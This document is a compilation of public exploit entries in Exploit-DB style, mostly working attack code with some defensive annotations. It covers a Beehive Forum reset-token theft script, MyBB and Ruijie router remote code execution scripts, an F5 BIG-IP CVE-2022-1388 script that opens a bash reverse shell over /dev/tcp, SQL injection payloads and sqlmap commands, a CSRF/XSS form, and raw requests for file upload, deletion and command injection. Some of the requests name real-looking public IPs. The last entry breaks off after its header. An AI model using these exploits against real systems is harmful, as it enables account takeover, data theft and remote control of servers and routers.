# Exploit Title: Beehive Forum - Account Takeover
# Date:08/05/2022.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.beehiveforum.co.uk/
# Software Link: https://sourceforge.net/projects/beehiveforum/
# Version: 1.5.2
# Tested on: Kali Linux and Ubuntu 20.0.4
# CVE N/A
# PoC: https://imgur.com/a/hVlgpCg
# Vulnerability: In the "forgot password" functionality it is possible to
# modify the "Host" header, injecting a malicious host; this allows an attacker
# to steal the reset token and reset a victim's password. (Requires user interaction)
import requests
from bs4 import BeautifulSoup
import socket
import sys
import urllib.parse
import random
import string
# Positional command-line arguments:
#   argv[1] = target forum host (used to build the two forum URLs below)
#   argv[2] = address this script binds its listener on (see socket_req)
#   argv[3] = port of that listener
endpoint = sys.argv[1]
lhost = sys.argv[2]
lport = int(sys.argv[3])
# Value injected into the request's Host header.  The forum evidently builds the
# password-reset link from it (socket_req receives the victim's click), which is
# the root cause: absolute links must come from a configured base URL, never
# from the client-supplied Host header.
hostheader = f'{lhost}:{lport}'
url_forgot = f'http://{endpoint}/forum/forgot_pw.php'
url_change = f'http://{endpoint}/forum/change_pw.php'
def init_req():
    """Fetch forgot_pw.php once and collect what a follow-up POST needs.

    Returns a tuple ``(hash_request, csrf_token, cookie)``: the ``id`` and
    ``value`` of the first ``<input>`` on the page (what the script treats as
    the per-request anti-CSRF field) and the ``sess_hash`` cookie the server set.

    Raises KeyError if no ``sess_hash`` cookie was set and TypeError if the
    page contains no ``<input>`` element at all.
    """
    session = requests.Session()
    r = session.get(url_forgot)
    cookie = session.cookies.get_dict()
    cookie = cookie['sess_hash']
    soup = BeautifulSoup(r.text, 'lxml')
    # First <input> on the page: its id is the field name, its value the token.
    hash_request = soup.input['id']
    csrf_token = soup.input['value']
    return hash_request, csrf_token, cookie
def forgot_req(hash_request: str, csrf_token: str, cookie: str):
    """Submit the password-reset form for the ``admin`` account with a forged Host header.

    ``hash_request``, ``csrf_token`` and ``cookie`` come from init_req().  The
    POST goes to ``url_forgot`` (the real target); only the Host header is
    replaced by the module-level ``hostheader``.  When the success banner is
    found the function hands over to socket_req(); otherwise it prints a
    failure message.  Returns None.

    Defensive note: the server must not derive the reset URL in the e-mail
    from the Host header; use a configured canonical base URL and reject
    unexpected Host values.
    """
    headers= {
        'Host': hostheader,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }
    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',       # hard-coded forum webtag
        'logon' : 'admin',       # account whose reset is requested
        'request' : 'Request'
    }
    r = requests.post(url_forgot, headers=headers, data=data)
    if('You should shortly receive an e-mail containing instructions for resetting your password' in r.text):
        print('')
        print('[*] A mail has been sent to the victim')
        socket_req()
    else:
        print('[*] The mail has not been sent')
def socket_req():
    """Listen on (lhost, lport), accept one connection and read the reset token from it.

    The e-mailed reset link points at ``hostheader`` (see forgot_req), so the
    victim's click arrives here.  The function reads up to 4096 bytes once,
    takes the 13 characters preceding the first ``" HTTP"`` in the request
    line, URL-decodes them and passes the result to change_pw().  Returns None.

    Review notes: neither the listening socket nor the accepted connection is
    ever closed; the single recv() and the fixed 13-character slice are
    assumptions about the request shape — TODO confirm against the forum's
    link format.
    """
    print(f"[*] Listening on port {lport}...." )
    print('[*] Waitting the victim clicks in the malicious link\n')
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((lhost, lport))
    s.listen()
    (sock_c, _) = s.accept()
    get_request = sock_c.recv(4096)
    # Request line is expected to look like "GET /...<token> HTTP/1.1"; the
    # token is taken as the last 13 characters before " HTTP".
    user_token = urllib.parse.unquote_plus(get_request.split(b" HTTP")[0][-13:].decode("UTF-8"))
    print("[*] Stole token: " + user_token)
    change_pw(user_token)
def change_pw(user_token: str):
    """Use a captured reset token to set a new random 6-character password for user id 1.

    ``user_token`` is the value recovered by socket_req().  A fresh CSRF field
    and session cookie are obtained via init_req(), then change_pw.php is
    POSTed with ``u=1`` (user id), ``h=<token>`` and the new password twice.
    Prints the new password when the success banner is found.  Returns None.

    Review note: the else-branch message is misleading — it reports "has been
    changed" even though the success banner was NOT found.
    """
    # 6-character alphanumeric password from the non-cryptographic random module.
    c = string.ascii_letters + string.digits
    password = ''.join(random.choice(c) for _ in range(6))
    hash_request, csrf_token, cookie = init_req()
    headers= {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0',
        'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
        'Cookie' : 'sess_hash=' + cookie
    }
    data = {
        hash_request : csrf_token,
        'webtag' : 'TEST',
        'u' : '1',             # hard-coded target user id
        'h' : user_token,      # reset token from the intercepted link
        'pw' : password,
        'cpw' : password,      # confirmation field
        'save' : 'Save'
    }
    r = requests.post(url_change, headers=headers, data=data)
    if('Your password has been changed' in r.text):
        print(f'[*] The password has been changed to: {password}')
    else:
        print('[*] The password has been changed')
# Entry point: obtain a CSRF field/session pair, then send the poisoned reset
# request; forgot_req() itself waits for the victim's click and finishes.
hash_request, csrf_token, cookie = init_req()
forgot_req(hash_request, csrf_token, cookie)
# Exploit Title: MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-05-08
# Exploit Author: Altelus
# Vendor Homepage: https://mybb.com/
# Software Link: https://github.com/mybb/mybb/releases/tag/mybb_1829
# Version: MyBB 1.8.29
# Tested on: Linux
# CVE : CVE-2022-24734
# An RCE can be obtained on MyBB's Admin CP in Configuration -> Add New Setting.
# The user must have a rights to add or update setting. This is tested on MyBB 1.8.29.
# The vulnerability may have existed as early as 1.4.0 since this
# 'php' checking is introduced in 1.4.0 (https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f)
import requests
import argparse
import random
import string
from base64 import b64decode
from bs4 import BeautifulSoup
def login(username, password):
    """Log into the MyBB Admin CP using the shared session ``r_client``.

    Posts ``username``/``password`` to ``host + "/admin/index.php"``; both
    ``r_client`` and ``host`` are module globals assigned at the bottom of the
    file.  Terminates the process (status 0) when the invalid-credentials
    message is found, otherwise prints a success line.  Returns None.
    """
    data = {
        "username" : username,
        "password" : password,
        "do" : "login"
    }
    login_txt = r_client.post(host + "/admin/index.php", data=data).text
    if "The username and password combination you entered is invalid" in login_txt:
        print("[-] Login failure. Incorrect credentials supplied")
        exit(0)   # note: exits with status 0 on failure
    print("[+] Login successful!")
def add_settings(cmd, raw_cmd=""):
    """Create a new Admin CP setting whose ``extra`` field carries PHP code (CVE-2022-24734).

    Args:
        cmd: shell command whose output is captured base64-encoded (used when
            ``raw_cmd`` is empty).
        raw_cmd: command handed to system() as-is, without base64 wrapping.

    Returns:
        The random setting name (see get_rand_string) so that get_cmd_result()
        can locate the row later.

    Exits with status 0 when the account lacks the right to add settings or
    when the POST is not answered with a 302 redirect.  Uses the module
    globals ``r_client`` and ``host``.

    Root cause as exercised here: the setting type is sent as "\\tphp" —
    presumably so the server's check for the literal "php" type does not
    trigger — and the ``extra`` value closes a PHP string literal.  Defensive
    angle: audit Admin CP setting additions whose type contains control
    characters or whose extra contains function calls, and upgrade to the
    release named in the advisory linked in the header.
    """
    config_settings_txt = r_client.get(host + "/admin/index.php?module=config-settings&action=add").text
    if "Access Denied" in config_settings_txt:
        print("[-] Supplied user doesn't have the rights to add a setting")
        exit(0)
    print("[*] Adding a malicious settings...")
    soup = BeautifulSoup(config_settings_txt, "lxml")
    # Admin CP anti-CSRF token embedded in the form.
    my_post_key = soup.find_all("input", {"name" : "my_post_key"})[0]['value']
    rand_string = get_rand_string()
    if raw_cmd != "":
        extra = "\" . system('{}') .\"".format(raw_cmd)
    else:
        # base64 -w 0 keeps the output on one line; get_cmd_result() decodes it.
        extra = "\" . system('{} | base64 -w 0') .\"".format(cmd)
    data = {
        "my_post_key" : my_post_key,
        "title" : "An innocent setting",
        "description" : "An innocent description",
        "gid" : 1,
        "disporder" : "",
        "name" : rand_string,
        "type" : "\tphp",
        "extra" : extra,
        "value" : "An innocent value"
    }
    post_setting = r_client.post(host + "/admin/index.php?module=config-settings&action=add",data=data,allow_redirects=False)
    if post_setting.status_code != 302:
        # A non-redirect response is expected to carry an error <div>; show its text.
        soup = BeautifulSoup(post_setting.text, "lxml")
        error_txt = soup.find_all("div", {"class" : "error"})[0].text
        print("[-] Exploit didn't work. Reason: '{}'".format(error_txt))
        exit(0)
    print("[+] Malicious post settings accepted!")
    return rand_string
def get_rand_string(length=20):
    """Return a random string of ``length`` ASCII letters (non-cryptographic)."""
    alphabet = string.ascii_letters
    picks = [random.choice(alphabet) for _ in range(length)]
    return "".join(picks)
def get_cmd_result(ident_string, raw_cmd=""):
    """Read the command output back from the settings list page and print it.

    ``ident_string`` is the random setting name returned by add_settings();
    its row (``row_setting_<name>``) on the config-settings change page holds
    the rendered ``extra`` value, i.e. the system() output.  When ``raw_cmd``
    is empty that output is base64 (see add_settings) and is decoded after
    dropping the first two characters — presumably a fixed prefix in the
    rendered cell; TODO confirm.  Uses the module globals ``r_client`` and
    ``host``.  Returns None.
    """
    conf_settings_list = r_client.get(host + "/admin/index.php?module=config-settings&action=change").text
    soup = BeautifulSoup(conf_settings_list, "lxml")
    row_setting = soup.find_all("tr", {"id" : "row_setting_{}".format(ident_string)})[0]
    cmd_result = row_setting.find_all("div", {"class" : "form_row"})[0].text
    if raw_cmd == "":
        cmd_result = b64decode(cmd_result[2:]).decode()
    print("[+] Result: {}".format(str(cmd_result)))
# Command-line interface.
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, help="MyBB Admin CP username")
parser.add_argument('--password', required=True, help="MyBB Admin CP password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--cmd', required=False, help="Command to run")
parser.add_argument('--raw_cmd', required=False, help="Command to run directly into system()")
args = parser.parse_args()
username = args.username
password = args.password
host = args.host   # module global read by login(), add_settings() and get_cmd_result()
# Defaults: "id" when --cmd is absent, no raw command.  (`is None` is the
# idiomatic comparison; `== None` behaves the same for argparse's None.)
cmd = "id" if args.cmd == None else args.cmd
raw_cmd = "" if args.raw_cmd == None else args.raw_cmd
r_client = requests.Session()   # shared session so the Admin CP login cookie persists
# Flow: log in -> plant the setting -> read the command output back.
login(username, password)
ident_string = add_settings(cmd, raw_cmd=raw_cmd)
get_cmd_result(ident_string, raw_cmd=raw_cmd)
# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye
SexyPolling SQL Injection
====================
| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
Summary
========
[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.
Vulnerability Description
====================
In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.
In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:
```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```
These are later used unfiltered by the WHERE clause:
```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
Proof Of Concept
==============
To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6
polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```
The HTTP response contains a MySQL error:
```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```
Vulnerable Versions
================
All versions below version 2.1.8
Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7
Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.
Mitigation
=========
Sexy Polling 2.1.8 fixed that issue
Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |
*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*
Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Vulnerable Code:
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department) LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");
# Vulnerable URL
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
# POC
```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```
# POC Image
https://prnt.sc/AECcFRHhe2ib
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Date: 2021-07-27
Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Vendor Homepage : https://wpscan.com/plugin/blue-admi
Version : <= 21.06.01
Tested on: windows 10 Professional
CVE : CVE-2021-24581
<!-- CSRF PoC: a logged-in WordPress administrator who presses "Submit request"
     sends this cross-origin POST to the plugin's settings handler, which
     evidently accepts it without a nonce and persists the logo_text payload
     (stored XSS).  Plugin-side mitigation: validate a nonce on the handler
     (check_admin_referer / wp_verify_nonce) and escape logo_text on output. -->
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />
<input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />
<input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />
<input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />
<input type="hidden" name="ba_lp_attr[logo_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />
<input type="hidden" name="ba_lp_attr[text_color]" value="222222" />
<input type="hidden" name="ba_lp_attr[bg_img]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />
<input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />
<input type="hidden" name="ba_lp_options_save" value="Save changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164
#!/usr/bin/python3
import os
import sys
import time
import requests
import json
def enc(PASS):
    """Encrypt ``PASS`` with the openssl CLI in the form the router's login API accepts.

    Runs ``openssl enc -aes-256-cbc -a -k <key> -md md5`` through a shell and
    returns its base64 output, stripped.  ``key`` is a hard-coded passphrase;
    since the device evidently accepts the result (see the login call below),
    this is obfuscation of the password rather than protection.

    Review note: PASS is interpolated into a shell command string, so a
    password containing a single quote breaks the command — a subprocess
    argument list would avoid that.
    """
    key = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()
# Positional arguments; a missing one raises IndexError, caught below as usage.
try:
    TARGET = sys.argv[1]
    USER = sys.argv[2]
    PASS = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage: python3 exploit.py <target> <user> <pass> <command>")
    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
    sys.exit(1)
# Step 1: authenticate against the LuCI auth API to obtain a session id (sid).
endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
    "method": "login",
    "params": {
        "username": USER,
        "password": enc(PASS),   # password in the device's own encrypted form
        "encry": True,
        "time": int(time.time()),
        "limit": False
    }
}
r = requests.post(endpoint, json=payload)
# A KeyError here means login failed (no data.sid in the reply) — not handled.
sid = json.loads(r.text)["data"]["sid"]
# Step 2 (the CVE): the wireless API's updateVersion method evidently passes
# jsonparam into a shell command unsanitised; the quote/semicolon/hash close
# the original argument, run COMMAND and comment out the rest.
# Detection: POSTs to /cgi-bin/luci/api/wireless with method "updateVersion"
# whose jsonparam contains shell metacharacters.  Mitigation: vendor firmware
# update for CVE-2021-43164 and restricting management access to trusted networks.
endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
    "method": "updateVersion",
    "params": {
        "jsonparam": "'; {} #".format(COMMAND)
    }
}
r = requests.post(endpoint, json=payload)
print(r.text)
# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428
# Vulnerability Description
# Because WebDAV (Web Distributed Authoring and Versioning) is enabled
# on the remote server, telesquare TLR-2021 allows unauthorized users to upload
# any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml), which can also
# lead to remote code execution.
# Because of WebDAV, it is possible to upload an arbitrary
# file using the PUT method.
# Proof-of-Concept
# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
    """Print the banner (ASCII art, author and links).  Returns None."""
    print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ <
| |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) |
\_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
''')
def exploit(url, lhost, lport):
    """Send the CVE-2022-1388 iControl REST request that runs a bash reverse shell.

    Args:
        url: base URL of the BIG-IP management interface; it must end with '/'
            because the path is appended by plain string concatenation.
        lhost: address the ``bash -i`` shell connects back to.
        lport: port for that connection (a str here; it is only interpolated).

    Prints the HTTP status code of the response.  Returns None.

    What the headers show: ``Authorization: Basic YWRtaW46`` is ``admin:``
    (empty password) and ``Connection: keep-alive, X-F5-Auth-Token`` declares
    the token header hop-by-hop so an intermediary drops it — the publicly
    described shape of the CVE-2022-1388 auth bypass.  Detection: requests to
    /mgmt/ whose Connection header names X-F5-Auth-Token.  Mitigation: apply
    F5's fix for CVE-2022-1388 and keep the management plane off untrusted
    networks.
    """
    url = url + 'mgmt/tm/util/bash'   # plain concatenation: url must end in '/'
    data = {
        "command":"run",
        "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
    }
    headers = {
        'Authorization': 'Basic YWRtaW46',              # base64 of "admin:"
        'Connection':'keep-alive, X-F5-Auth-Token',     # marks the token header hop-by-hop
        'X-F5-Auth-Token': '0'
    }
    s = Session()
    req = Request('POST', url, json=data, headers=headers)
    prepped = req.prepare()
    # The JSON Content-Type header set by prepare() is removed before sending;
    # the reason is not stated — presumably the endpoint accepts the body anyway.
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
        verify=False,   # TLS certificate verification is disabled
        timeout=15
    )
    #print(prepped.headers)
    #print(url)
    #print(resp.headers)
    #print(resp.json())
    print(resp.status_code)
# Entry point: banner, argument check, then one request.
# Review note: exploit() appends its path with plain concatenation, so the
# base URL needs a trailing '/'; the usage examples below omit it, so either
# the examples or the concatenation is inconsistent.
if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)   # note: status 0 even on a usage error
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])
# Exploit Title: TLR-2005KSH - Arbitrary File Delete
# Date: 2022-05-11
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-46424
# Proof-of-Concept
# Request
DELETE /cgi-bin/test2.txt HTTP/1.1
Host: 220.89.223.215:8083
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Date: 2022-26-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28080
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
------------------------------------------------------------------------------------
1. Description:
----------------------
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite, intercept the request from the affected page with the
'todate' parameter and save it as poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
4. Burpsuite request:
----------------------
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)
# Date: 2022-24-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/
# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28079
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079
------------------------------------------------------------------------------------
1. Description:
----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code' in
/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite, intercept the request from the affected page with the
'course_code' parameter and save it as poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:
----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection
# Date: 2022-05-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# CVE : CVE-2021-46422
# Tested on: Windows
# HTTP Request
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: IP_HERE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: */*
Referer: http:// IP_HERE /admin/system_command.shtml
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
